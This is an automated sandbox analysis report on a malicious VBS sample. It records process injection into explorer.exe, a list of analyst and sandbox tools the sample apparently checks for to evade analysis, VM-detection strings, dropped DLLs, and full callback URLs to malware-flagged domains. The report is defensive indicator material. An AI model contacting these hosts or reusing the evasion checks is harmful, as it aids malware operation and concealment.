Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.1015558083.000001BA1E067000.00000004.00000001.sdmp	Binary or memory string: D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp	Binary or memory string: FORTITRACER.EXEA

Source: C:\Windows\System32\wscript.exe TID: 2944	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6400	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6400	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3833			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4955			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.dll			Jump to dropped file

Source: explorer.exe, 0000001F.00000000.1201286212.000000000A9A0000.00000004.00000001.sdmp	Binary or memory string: 63}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&\
Source: explorer.exe, 0000001F.00000000.1176071944.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.1193929316.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mshta.exe, 00000018.00000003.1120112463.000002024752E000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}
Source: explorer.exe, 0000001F.00000000.1176071944.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.1190265306.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 0000001F.00000000.1176375250.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 0000001F.00000000.1176375250.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: mshta.exe, 00000018.00000003.1120112463.000002024752E000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: BD4F1580			Jump to behavior
Source: C:\Windows\System32\control.exe	Thread created: unknown EIP: BD4F1580

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF7076312E0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: D40000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF7076312E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 816000	Jump to behavior

Source: explorer.exe, 0000001F.00000000.1185985554.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: rundll32.exe, 00000015.00000002.1191879240.0000000003660000.00000002.00020000.sdmp, powershell.exe, 00000019.00000002.1216504835.000001B6D17E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000002.1216918020.0000000001080000.00000002.00020000.sdmp, control.exe, 00000020.00000000.1177802449.0000016F932E0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: rundll32.exe, 00000015.00000002.1191879240.0000000003660000.00000002.00020000.sdmp, powershell.exe, 00000019.00000002.1216504835.000001B6D17E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000002.1216918020.0000000001080000.00000002.00020000.sdmp, control.exe, 00000020.00000000.1177802449.0000016F932E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000015.00000002.1191879240.0000000003660000.00000002.00020000.sdmp, powershell.exe, 00000019.00000002.1216504835.000001B6D17E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000002.1216918020.0000000001080000.00000002.00020000.sdmp, control.exe, 00000020.00000000.1177802449.0000016F932E0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000015.00000002.1191879240.0000000003660000.00000002.00020000.sdmp, powershell.exe, 00000019.00000002.1216504835.000001B6D17E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000002.1216918020.0000000001080000.00000002.00020000.sdmp, control.exe, 00000020.00000000.1177802449.0000016F932E0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000001F.00000000.1176375250.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Windows Analysis Report presentation[2021.09.09_15-26].vbs

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Name	IP	Active
resolver1.opendns.com	208.67.222.222	true
art.microsoftsofymicrosoftsoft.at	188.127.235.42	true
atl.bigbigpoppa.com	188.127.235.42	true

Name	Malicious	Antivirus Detection	Reputation
http://art.microsoftsofymicrosoftsoft.at/0QTFQ19LsLPPw2WV1xJ/YcBhtZLzUs6CSioSs9dLnb/aEb6zuvJhqdcs/1Hb1sg90/RWaFAF1NEpmrckuTWKaPqAA/24G0Hczqd6/RbhQoaSPqBLCdZu1n/MpE8YBnCkgqe/EyYs8PTQfhS/e3P4PnLK5TJvEZ/zj0oBbuVnCwlxQAQ_2FhY/0Zu1rFoV_2B4IBxL/S0k_2BzfYQGXk4l/RlIY9NCU_2Bq2C0qZR/XkIkWaJBq/tdpiFuEgu5qCEOsijppu/WtAIhPYjfYVFXMRTyYR/vZDnI_2BfmuNdCFB6L924B/9580GsWQ3CLj4/gdGO_2FS/6	true	Avira URL Cloud: safe	unknown
http://art.microsoftsofymicrosoftsoft.at/J7vFZ3DnKfP9_2BLqsOzhE/_2B0sX39iqKXX/xRC3_2Bn/FR7I7tC4Y_2BKbKZhTipXKo/Y68Clp5syo/AKjqJkiRp4I9iXaE1/6hTqbwupKV0Z/G7JGvRt1lPU/_2FoM5FRPpNFQ7/Q0DKQKOrk_2B_2BMtgkLi/AHH7yDMmOl_2BC_2/Bw6mGTTnqH2yR_2/BWwJ_2BspWSt3ypb_2/B3jzGWYjP/wQws_2BBySwRC_2FSzoA/9eCjcMJ9yhEG_2BMBin/PBuDF_2BwHt7nPiirKF3ia/yI6rUSMPL1t1W/Tqi6oYDf/4qfPSjhH9hVkFRq5vohLKMn/uKsZDY_2Bm7_2FTYT00/CD	true	Avira URL Cloud: safe	unknown
http://atl.bigbigpoppa.com/_2Bd0AwZG9XFE1JsQD/cYUPvk3qo/ww4_2FJnUCtl_2FACzcA/gxGADMlKA5cRRoa6VfN/bztGPiRkqBO_2FeJB_2BBD/IZBC0D711zpQe/9l1y4Uwd/xWWDr7ndPnPsd3SHIlHFSP9/fiR_2F5_2B/KN2_2B_2B5ItX8nNz/A90VzmqpXUKU/D_2BBXI_2Fv/Sm1xwqkwGWKzxN/PYriFQN1XTg1Mt_2Fdo2G/CZqhw6Gkw9Ga7J6_/2Bpy6_2BqUSt_2F/vDyCdPXYj3I1xnWURR/qEzCiHG74/IyTcmp76Fgjy6Le_2BYj/rD_2FzgWNQQxd_2BIyQ/7fmZMqR3a8eHDmZNS7_2Fe/dWNBCQOVIE_2F/6naTDq9tL/Nw	true	Avira URL Cloud: malware	unknown
http://atl.bigbigpoppa.com/ls0YKrv_/2BJV6E5mlJLydgYjyupmqAO/ebshbxfLmK/53ueumhRK5uHsu1wq/kpnvHeT3BjeE/FCqvgS3hqwT/mPkNYDb32X1Qkc/N7G1r4IU6bUFNgu5BVVbX/yjbVABqaYeB8_2B_/2Fc9vKfZ4hMWLC_/2F14B5QvoOUabGWCw8/plYcnGyms/aXOFWp0J_2FK_2F8o_2B/CI_2FWn_2BX374n3ww4/TG_2ByfgHphR5COejTHsMy/gz3rKYS9XKGwv/EDh6_2Fg/2ikTmUt7QTCri3TRpRtQJWb/r2fO6KX7SN/6mXIe2jQ1oyEIqRjM/CLsIWaugZB_2/FhqkmGlAeUa/nn8rVI84Q/hCoKY5	true	Avira URL Cloud: malware	unknown
http://atl.bigbigpoppa.com/fLZmMbWHBrDjVjdoP/PBIC_2FBgMAC/GLBRSVYh_2B/gOgSU0YMdVq_2B/zcwHoIWkheDXq9xczsBhd/ElAduBsByQvdzYtm/u1rHkcLjXfXx1mz/65IOgBlAGjO7Q3M6vt/veJ56XC29/VYs86CKFiCgfUKe_2BfC/Owi_2FUGONT8UvwdsM8/JqV4Jr0011ZtMPmdvDnIrg/UTgh1kCejVnav/Uy_2FGvp/eeZw5tLTiHgf8fP7rzbZynm/BFygaGjj9P/SHhlv5Dn_2B4k8NOM/1M_2FM_2BW8G/dlVQieXVKAn/Zjy1O5qAJEGMC1/sQMiemHb82h85qSPQL4KI/K6v7yXzTOl7hZz/W	true	Avira URL Cloud: malware	unknown

ID:	482024
Product:	CloudBasic
Start time:	11:00:02
Start date:	13.09.2021
Sample:	presentation[2021.09.09_15-26].vbs
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	783f03c1b5f346544c131ea2b164e54d
SHA1:	9100e6d4ce0edfcb161552fdf2721835f12470a2
SHA256:	683fbb9eb6fd6a0a2bab8471d1be28bd45f0598e1db19dc3f6d7536f1c4b5e8b

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	7A57D8959BFD0B97B364F902ACD60F90	7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F	47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
C:\Users\user\AppData\Local\Temp\RESDDD0.tmp	data	17809BE2706F8B826C8B1CDBAA072BAA	BB97386289DE43AC3CB3F27F033F1A8A6D8451D8	10F5C1528F17439A47FEBB9DEA2ED8699DACE2F14DC505615C1FD04B692EE53F
C:\Users\user\AppData\Local\Temp\RESEAC0.tmp	data	7ABA3FD93D494DCB4E16157949523B3B	F24786D9D54A2446A77DEE3DF77B496D7123C422	9E7E96C48810D460E408EA411619BDD6F4ABEB8F93048859620BCB88289E6D8D
